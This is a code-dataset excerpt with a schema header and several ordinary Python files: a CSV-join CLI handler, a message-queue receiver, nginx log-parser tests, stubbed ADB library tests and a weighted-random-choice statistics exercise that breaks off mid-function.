hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0cdfbe0659d37b3cc8cc00e18f2f0edb48d21d4a
| 3,410
|
py
|
Python
|
src/scs_airnow/cmd/cmd_csv_join.py
|
south-coast-science/scs_airnow
|
7f0657bd434aa3abe667f58bc971edaa00d0c24c
|
[
"MIT"
] | null | null | null |
src/scs_airnow/cmd/cmd_csv_join.py
|
south-coast-science/scs_airnow
|
7f0657bd434aa3abe667f58bc971edaa00d0c24c
|
[
"MIT"
] | null | null | null |
src/scs_airnow/cmd/cmd_csv_join.py
|
south-coast-science/scs_airnow
|
7f0657bd434aa3abe667f58bc971edaa00d0c24c
|
[
"MIT"
] | null | null | null |
"""
Created on 22 Feb 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
source repo: scs_analysis
"""
import optparse
# --------------------------------------------------------------------------------------------------------------------
class CmdCSVJoin(object):
"""unix command line handler"""
def __init__(self):
"""
Constructor
"""
self.__parser = optparse.OptionParser(usage="%prog [-t TYPE] [-i] [-v] -l PREFIX PK FILENAME "
"-r PREFIX PK FILENAME", version="%prog 1.0")
# compulsory...
self.__parser.add_option("--left", "-l", type="string", nargs=3, action="store", dest="left",
help="output path prefix, primary key and filename for left-hand set")
self.__parser.add_option("--right", "-r", type="string", nargs=3, action="store", dest="right",
help="output path prefix, primary key and filename for right-hand set")
# optional...
self.__parser.add_option("--type", "-t", type="string", nargs=1, action="store", dest="type", default='INNER',
help="{ 'INNER' | 'LEFT' | 'RIGHT' | 'FULL' } (default 'INNER')")
self.__parser.add_option("--iso8601", "-i", action="store_true", dest="iso8601", default=False,
help="interpret the primary key as an ISO 8601 datetime")
self.__parser.add_option("--verbose", "-v", action="store_true", dest="verbose", default=False,
help="report narrative to stderr")
self.__opts, self.__args = self.__parser.parse_args()
# ----------------------------------------------------------------------------------------------------------------
def is_valid(self):
if self.__opts.left is None or self.__opts.right is None:
return False
return True
# ----------------------------------------------------------------------------------------------------------------
@property
def type(self):
return self.__opts.type
@property
def left_prefix(self):
return None if self.__opts.left is None else self.__opts.left[0]
@property
def left_pk(self):
return None if self.__opts.left is None else self.__opts.left[1]
@property
def left_filename(self):
return None if self.__opts.left is None else self.__opts.left[2]
@property
def right_prefix(self):
return None if self.__opts.right is None else self.__opts.right[0]
@property
def right_pk(self):
return None if self.__opts.right is None else self.__opts.right[1]
@property
def right_filename(self):
return None if self.__opts.right is None else self.__opts.right[2]
@property
def iso8601(self):
return self.__opts.iso8601
@property
def verbose(self):
return self.__opts.verbose
# ----------------------------------------------------------------------------------------------------------------
def print_help(self, file):
self.__parser.print_help(file)
def __str__(self, *args, **kwargs):
return "CmdCSVJoin:{type:%s, left:%s, right:%s, iso8601:%s, verbose:%s}" % \
(self.type, self.__opts.left, self.__opts.right, self.iso8601, self.verbose)
| 31.284404
| 118
| 0.509091
| 3,152
| 0.92434
| 0
| 0
| 854
| 0.25044
| 0
| 0
| 1,267
| 0.371554
|
0ce058cd8a6d65a8bc31474a1e02dc8c29923fe6
| 338
|
py
|
Python
|
test/receive_message.py
|
unknown-admin/easymq
|
e29b8f63402e385059ff8c263b0e7bb8e9fbd24b
|
[
"Apache-2.0"
] | 1
|
2020-04-20T14:01:34.000Z
|
2020-04-20T14:01:34.000Z
|
test/receive_message.py
|
unknown-admin/easymq
|
e29b8f63402e385059ff8c263b0e7bb8e9fbd24b
|
[
"Apache-2.0"
] | null | null | null |
test/receive_message.py
|
unknown-admin/easymq
|
e29b8f63402e385059ff8c263b0e7bb8e9fbd24b
|
[
"Apache-2.0"
] | 1
|
2022-02-18T08:18:08.000Z
|
2022-02-18T08:18:08.000Z
|
import os
from easymq.mq import MQ
def receive(headers, body):
print("---->", body)
mq = MQ(
mq_user=os.environ.get("mq_user"),
password=os.environ.get("password"),
host_and_ports=[
(os.environ.get("host"), os.environ.get("port")),
],
func=receive,
queue_name="/queue/test_queue",
)
mq.receive()
| 16.095238
| 57
| 0.612426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 57
| 0.168639
|
0ce0840b66e590ef2a41c729b631412a225153c7
| 12,383
|
py
|
Python
|
test/unit/agent/common/util/text.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 308
|
2015-11-17T13:15:33.000Z
|
2022-03-24T12:03:40.000Z
|
test/unit/agent/common/util/text.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 211
|
2015-11-16T15:27:41.000Z
|
2022-03-28T16:20:15.000Z
|
test/unit/agent/common/util/text.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 80
|
2015-11-16T18:20:30.000Z
|
2022-03-02T12:47:56.000Z
|
# -*- coding: utf-8 -*-
from hamcrest import *
from test.base import BaseTestCase
from amplify.agent.common.util.text import (
decompose_format, parse_line, parse_line_split
)
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "grant.hulegaard@nginx.com"
COMBINED_FORMAT = '$remote_addr - $remote_user [$time_local] "$request" ' + \
'$status $body_bytes_sent "$http_referer" "$http_user_agent"'
class UtilTextTestCase(BaseTestCase):
def test_decompose_format_regular(self):
keys, trie, non_key_patterns, first_value_is_key = decompose_format(
COMBINED_FORMAT, full=True
)
assert_that(keys, not_none())
assert_that(trie, not_none())
assert_that(non_key_patterns, not_none())
assert_that(first_value_is_key, equal_to(True))
assert_that(keys, equal_to([
'remote_addr', 'remote_user', 'time_local', 'request', 'status',
'body_bytes_sent', 'http_referer', 'http_user_agent'
]))
assert_that(non_key_patterns, equal_to([
' - ', ' [', '] "', '" ', ' ', ' "', '" "', '"'
]))
def test_decompose_format_different(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" ' + \
'"$http_user_agent" rt=$request_time ' + \
'ut="$upstream_response_time" cs=$upstream_cache_status'
keys, trie, non_key_patterns, first_value_is_key = decompose_format(log_format, full=True)
assert_that(keys, not_none())
assert_that(trie, not_none())
assert_that(non_key_patterns, not_none())
assert_that(first_value_is_key, equal_to(True))
assert_that(keys, equal_to([
'remote_addr', 'remote_user', 'time_local', 'request', 'status',
'body_bytes_sent', 'http_referer', 'http_user_agent',
'request_time', 'upstream_response_time', 'upstream_cache_status'
]))
assert_that(non_key_patterns, equal_to([
' - ', ' [', '] "', '" ', ' ', ' "', '" "', '" rt=', ' ut="',
'" cs='
]))
def test_parse_line(self):
keys, trie = decompose_format(COMBINED_FORMAT)
line = '127.0.0.1 - - [02/Jul/2015:14:49:48 +0000] "GET /basic_status HTTP/1.1" 200 110 "-" ' + \
'"python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic"'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['http_user_agent'], equal_to(
'python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic'
))
def test_parse_line_split(self):
keys, _, non_key_patterns, first_value_is_key = decompose_format(COMBINED_FORMAT, full=True)
line = '127.0.0.1 - - [02/Jul/2015:14:49:48 +0000] "GET /basic_status HTTP/1.1" 200 110 "-" ' + \
'"python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic"'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['http_user_agent'], equal_to(
'python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic'
))
def test_parse_line_non_standard_http_method(self):
keys, trie = decompose_format(COMBINED_FORMAT)
line = '127.0.0.1 - - [02/Jul/2015:14:49:48 +0000] "PROPFIND /basic_status HTTP/1.1" 200 110 "-" ' + \
'"python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic"'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['http_user_agent'], equal_to(
'python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic'
))
def test_parse_line_split_non_standard_http_method(self):
keys, _, non_key_patterns, first_value_is_key = decompose_format(
COMBINED_FORMAT, full=True
)
line = '127.0.0.1 - - [02/Jul/2015:14:49:48 +0000] "PROPFIND /basic_status HTTP/1.1" 200 110 "-" ' + \
'"python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic"'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['http_user_agent'], equal_to(
'python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic'
))
def test_parse_line_upstream_log_format(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time ut="$upstream_response_time" cs=$upstream_cache_status'
keys, trie = decompose_format(log_format)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 ut="2.001, 0.345" cs=MISS'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_cache_status'], equal_to('MISS'))
# check some complicated values
assert_that(results['request_time'], equal_to('0.010'))
assert_that(results['upstream_response_time'], equal_to('2.001, 0.345'))
def test_parse_line_split_upstream_log_format(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time ut="$upstream_response_time" cs=$upstream_cache_status'
keys, _, non_key_patterns, first_value_is_key = decompose_format(log_format, full=True)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 ut="2.001, 0.345" cs=MISS'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_cache_status'], equal_to('MISS'))
# check some complicated values
assert_that(results['request_time'], equal_to('0.010'))
assert_that(results['upstream_response_time'], equal_to('2.001, 0.345'))
def test_parse_line_upstream_log_format_empty_upstreams(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time cs=$upstream_cache_status ut="$upstream_response_time"'
keys, trie = decompose_format(log_format)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 cs=- ut="-"'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_response_time'], equal_to('-'))
assert_that(results['upstream_cache_status'], equal_to('-'))
def test_parse_line_split_upstream_log_format_empty_upstreams(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time cs=$upstream_cache_status ut="$upstream_response_time"'
keys, _, non_key_patterns, first_value_is_key = decompose_format(
log_format, full=True
)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 cs=- ut="-"'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_response_time'], equal_to('-'))
assert_that(results['upstream_cache_status'], equal_to('-'))
def test_parse_line_upstream_log_format_part_empty_upstreams(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time ut="$upstream_response_time" cs=$upstream_cache_status'
keys, trie = decompose_format(log_format)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 ut="-" cs=MISS'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_cache_status'], equal_to('MISS'))
def test_parse_line_split_upstream_log_format_part_empty_upstreams(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time ut="$upstream_response_time" cs=$upstream_cache_status'
keys, _, non_key_patterns, first_value_is_key = decompose_format(log_format, full=True)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 ut="-" cs=MISS'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_cache_status'], equal_to('MISS'))
| 42.407534
| 115
| 0.605023
| 11,847
| 0.956715
| 0
| 0
| 0
| 0
| 0
| 0
| 4,765
| 0.384802
|
0ce1ead7fccfec4e0bc42fdbdc128b022ce3b62a
| 9,982
|
py
|
Python
|
test/adb_test.py
|
bugobliterator/python-adb
|
2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0
|
[
"Apache-2.0"
] | 1,549
|
2015-01-04T04:45:48.000Z
|
2022-03-31T08:01:59.000Z
|
test/adb_test.py
|
bugobliterator/python-adb
|
2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0
|
[
"Apache-2.0"
] | 174
|
2015-01-04T04:47:39.000Z
|
2022-03-24T10:42:12.000Z
|
test/adb_test.py
|
bugobliterator/python-adb
|
2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0
|
[
"Apache-2.0"
] | 356
|
2015-01-09T10:10:33.000Z
|
2022-03-27T19:25:01.000Z
|
#!/usr/bin/env python
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for adb."""
from io import BytesIO
import struct
import unittest
from mock import mock
from adb import common
from adb import adb_commands
from adb import adb_protocol
from adb.usb_exceptions import TcpTimeoutException, DeviceNotFoundError
import common_stub
BANNER = b'blazetest'
LOCAL_ID = 1
REMOTE_ID = 2
class BaseAdbTest(unittest.TestCase):
@classmethod
def _ExpectWrite(cls, usb, command, arg0, arg1, data):
usb.ExpectWrite(cls._MakeHeader(command, arg0, arg1, data))
usb.ExpectWrite(data)
if command == b'WRTE':
cls._ExpectRead(usb, b'OKAY', 0, 0)
@classmethod
def _ExpectRead(cls, usb, command, arg0, arg1, data=b''):
usb.ExpectRead(cls._MakeHeader(command, arg0, arg1, data))
if data:
usb.ExpectRead(data)
if command == b'WRTE':
cls._ExpectWrite(usb, b'OKAY', LOCAL_ID, REMOTE_ID, b'')
@classmethod
def _ConvertCommand(cls, command):
return sum(c << (i * 8) for i, c in enumerate(bytearray(command)))
@classmethod
def _MakeHeader(cls, command, arg0, arg1, data):
command = cls._ConvertCommand(command)
magic = command ^ 0xFFFFFFFF
checksum = adb_protocol.AdbMessage.CalculateChecksum(data)
return struct.pack(b'<6I', command, arg0, arg1, len(data), checksum, magic)
@classmethod
def _ExpectConnection(cls, usb):
cls._ExpectWrite(usb, b'CNXN', 0x01000000, 4096, b'host::%s\0' % BANNER)
cls._ExpectRead(usb, b'CNXN', 0, 0, b'device::\0')
@classmethod
def _ExpectOpen(cls, usb, service):
cls._ExpectWrite(usb, b'OPEN', LOCAL_ID, 0, service)
cls._ExpectRead(usb, b'OKAY', REMOTE_ID, LOCAL_ID)
@classmethod
def _ExpectClose(cls, usb):
cls._ExpectRead(usb, b'CLSE', REMOTE_ID, 0)
cls._ExpectWrite(usb, b'CLSE', LOCAL_ID, REMOTE_ID, b'')
@classmethod
def _Connect(cls, usb):
return adb_commands.AdbCommands.Connect(usb, BANNER)
class AdbTest(BaseAdbTest):
@classmethod
def _ExpectCommand(cls, service, command, *responses):
usb = common_stub.StubUsb(device=None, setting=None)
cls._ExpectConnection(usb)
cls._ExpectOpen(usb, b'%s:%s\0' % (service, command))
for response in responses:
cls._ExpectRead(usb, b'WRTE', REMOTE_ID, 0, response)
cls._ExpectClose(usb)
return usb
def testConnect(self):
usb = common_stub.StubUsb(device=None, setting=None)
self._ExpectConnection(usb)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
def testConnectSerialString(self):
dev = adb_commands.AdbCommands()
with mock.patch.object(common.UsbHandle, 'FindAndOpen', return_value=None):
with mock.patch.object(adb_commands.AdbCommands, '_Connect', return_value=None):
dev.ConnectDevice(serial='/dev/invalidHandle')
def testSmallResponseShell(self):
command = b'keepin it real'
response = 'word.'
usb = self._ExpectCommand(b'shell', command, response)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(response, dev.Shell(command))
def testBigResponseShell(self):
command = b'keepin it real big'
# The data doesn't have to be big, the point is that it just concatenates
# the data from different WRTEs together.
responses = [b'other stuff, ', b'and some words.']
usb = self._ExpectCommand(b'shell', command, *responses)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(b''.join(responses).decode('utf8'),
dev.Shell(command))
def testUninstall(self):
package_name = "com.test.package"
response = 'Success'
usb = self._ExpectCommand(b'shell', ('pm uninstall "%s"' % package_name).encode('utf8'), response)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(response, dev.Uninstall(package_name))
def testStreamingResponseShell(self):
command = b'keepin it real big'
# expect multiple lines
responses = ['other stuff, ', 'and some words.']
usb = self._ExpectCommand(b'shell', command, *responses)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
response_count = 0
for (expected,actual) in zip(responses, dev.StreamingShell(command)):
self.assertEqual(expected, actual)
response_count = response_count + 1
self.assertEqual(len(responses), response_count)
def testReboot(self):
usb = self._ExpectCommand(b'reboot', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.Reboot()
def testRebootBootloader(self):
usb = self._ExpectCommand(b'reboot', b'bootloader', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.RebootBootloader()
def testRemount(self):
usb = self._ExpectCommand(b'remount', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.Remount()
def testRoot(self):
usb = self._ExpectCommand(b'root', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.Root()
def testEnableVerity(self):
usb = self._ExpectCommand(b'enable-verity', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.EnableVerity()
def testDisableVerity(self):
usb = self._ExpectCommand(b'disable-verity', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.DisableVerity()
class FilesyncAdbTest(BaseAdbTest):
@classmethod
def _MakeSyncHeader(cls, command, *int_parts):
command = cls._ConvertCommand(command)
return struct.pack(b'<%dI' % (len(int_parts) + 1), command, *int_parts)
@classmethod
def _MakeWriteSyncPacket(cls, command, data=b'', size=None):
if not isinstance(data, bytes):
data = data.encode('utf8')
return cls._MakeSyncHeader(command, size or len(data)) + data
@classmethod
def _ExpectSyncCommand(cls, write_commands, read_commands):
usb = common_stub.StubUsb(device=None, setting=None)
cls._ExpectConnection(usb)
cls._ExpectOpen(usb, b'sync:\0')
while write_commands or read_commands:
if write_commands:
command = write_commands.pop(0)
cls._ExpectWrite(usb, b'WRTE', LOCAL_ID, REMOTE_ID, command)
if read_commands:
command = read_commands.pop(0)
cls._ExpectRead(usb, b'WRTE', REMOTE_ID, LOCAL_ID, command)
cls._ExpectClose(usb)
return usb
def testPush(self):
filedata = b'alo there, govnah'
mtime = 100
send = [
self._MakeWriteSyncPacket(b'SEND', b'/data,33272'),
self._MakeWriteSyncPacket(b'DATA', filedata),
self._MakeWriteSyncPacket(b'DONE', size=mtime),
]
data = b'OKAY\0\0\0\0'
usb = self._ExpectSyncCommand([b''.join(send)], [data])
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.Push(BytesIO(filedata), '/data', mtime=mtime)
def testPull(self):
filedata = b"g'ddayta, govnah"
recv = self._MakeWriteSyncPacket(b'RECV', b'/data')
data = [
self._MakeWriteSyncPacket(b'DATA', filedata),
self._MakeWriteSyncPacket(b'DONE'),
]
usb = self._ExpectSyncCommand([recv], [b''.join(data)])
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(filedata, dev.Pull('/data'))
class TcpTimeoutAdbTest(BaseAdbTest):
@classmethod
def _ExpectCommand(cls, service, command, *responses):
tcp = common_stub.StubTcp('10.0.0.123')
cls._ExpectConnection(tcp)
cls._ExpectOpen(tcp, b'%s:%s\0' % (service, command))
for response in responses:
cls._ExpectRead(tcp, b'WRTE', REMOTE_ID, 0, response)
cls._ExpectClose(tcp)
return tcp
def _run_shell(self, cmd, timeout_ms=None):
tcp = self._ExpectCommand(b'shell', cmd)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=tcp, banner=BANNER)
dev.Shell(cmd, timeout_ms=timeout_ms)
def testConnect(self):
tcp = common_stub.StubTcp('10.0.0.123')
self._ExpectConnection(tcp)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=tcp, banner=BANNER)
def testTcpTimeout(self):
timeout_ms = 1
command = b'i_need_a_timeout'
self.assertRaises(
TcpTimeoutException,
self._run_shell,
command,
timeout_ms=timeout_ms)
class TcpHandleTest(unittest.TestCase):
def testInitWithHost(self):
tcp = common_stub.StubTcp('10.11.12.13')
self.assertEqual('10.11.12.13:5555', tcp._serial_number)
self.assertEqual(None, tcp._timeout_ms)
def testInitWithHostAndPort(self):
tcp = common_stub.StubTcp('10.11.12.13:5678')
self.assertEqual('10.11.12.13:5678', tcp._serial_number)
self.assertEqual(None, tcp._timeout_ms)
def testInitWithTimeout(self):
tcp = common_stub.StubTcp('10.0.0.2', timeout_ms=234.5)
self.assertEqual('10.0.0.2:5555', tcp._serial_number)
self.assertEqual(234.5, tcp._timeout_ms)
def testInitWithTimeoutInt(self):
tcp = common_stub.StubTcp('10.0.0.2', timeout_ms=234)
self.assertEqual('10.0.0.2:5555', tcp._serial_number)
self.assertEqual(234.0, tcp._timeout_ms)
if __name__ == '__main__':
unittest.main()
| 31.588608
| 102
| 0.696053
| 8,982
| 0.89982
| 0
| 0
| 3,106
| 0.31116
| 0
| 0
| 1,656
| 0.165899
|
0ce32973b15677a9edaeef840f01f4ffb57eb837
| 6,149
|
py
|
Python
|
06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py
|
felixdittrich92/numerisches_python
|
0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7
|
[
"MIT"
] | null | null | null |
06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py
|
felixdittrich92/numerisches_python
|
0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7
|
[
"MIT"
] | null | null | null |
06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py
|
felixdittrich92/numerisches_python
|
0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7
|
[
"MIT"
] | null | null | null |
from random import randint
import numpy as np
from collections import Counter
from pprint import pprint
import time
# Aufgaben Siehe Buch
print('-------------Aufgabe 1-------------')
outcomes = [ randint(1,6) for _ in range(10000)]
even_pips = [ x for x in outcomes if x % 2 == 0]
greater_two = [ x for x in outcomes if x > 2]
combined = [ x for x in outcomes if x % 2 == 0 and x > 2]
print(len(even_pips)/len(outcomes))
print(len(greater_two)/len(outcomes))
print(len(combined)/len(outcomes))
print('-------------Aufgabe 2-------------')
def find_interval(x, partition):
""" find_interval -> i
"i" will be the index for which applies
partition[i] < x < partition[i+1], if such an index exists.
-1 otherwise
"""
for i in range(0, len(partition)):
if x < partition[i]:
return i-1
return -1
def weighted_choice(sequence, weights, bisection=False):
"""
weighted_choice selects a random element of
the sequence according to the weights list
"""
x = np.random.random()
w = [0] + list(np.cumsum(weights))
index = find_interval(x, w)
return sequence[index]
def process_datafile(filename):
""" process_datafile -> (universities,enrollments,total_number_of_students)
universities: list of University
namesenrollments: corresponding list with enrollments
total_number_of_students: over all universities"""
universities=[]
enrollments=[]
with open(filename) as fh:
total_number_of_students= 0
fh.readline()# get rid of descriptive first line
for line in fh:
line=line.strip()
*praefix, under, post, total = line.rsplit()
university = praefix[1:]
total = int(total.replace(",",""))
enrollments.append(total)
universities.append(" ".join(university))
total_number_of_students += total
return(universities, enrollments, total_number_of_students)
universities, enrollments, total_students = process_datafile("universities_uk.txt")
"""
for i in range(14):
print(universities[i], end=": ")
print(enrollments[i])
print("Number of students enrolled in the UK: ", total_students)
"""
normalized_enrollments = [students / total_students for students in enrollments]
print(weighted_choice(universities, normalized_enrollments))
outcomes=[]
n= 100000
for i in range(n):
outcomes.append(weighted_choice(universities,normalized_enrollments))
c = Counter(outcomes)
pprint(c.most_common(20),indent=2, width=70)
print('-------------Aufgabe 3-------------')
def find_interval(x,
partition,
endpoints=True):
""" find_interval -> i
If endpoints is True, "i" will be the index for which applies
partition[i] < x < partition[i+1], if such an index exists.
-1 otherwise
If endpoints is False, "i" will be the smallest index
for which applies x < partition[i]. If no such index exists
"i" will be set to len(partition)
"""
for i in range(0, len(partition)):
if x < partition[i]:
return i-1 if endpoints else i
return -1 if endpoints else len(partition)
def weighted_choice(sequence, weights):
"""
weighted_choice selects a random element of
the sequence according to the list of weights
"""
x = np.random.random()
cum_weights = [0] + list(np.cumsum(weights))
index = find_interval(x, cum_weights)
return sequence[index]
def cartesian_choice(*iterables):
"""
A list with random choices from each iterable of iterables
is being created in respective order.
The result list can be seen as an element of the
Cartesian product of the iterables
"""
res = []
for population in iterables:
res.append(random.choice(population))
return res
def weighted_cartesian_choice(*iterables):
"""
A list with weighted random choices from each iterable of iterables
is being created in respective order
"""
res = []
for population, weights in iterables:
lst = weighted_choice(population, weights)
res.append(lst)
return res
def weighted_sample(population, weights, k):
"""
This function draws a random sample of length k
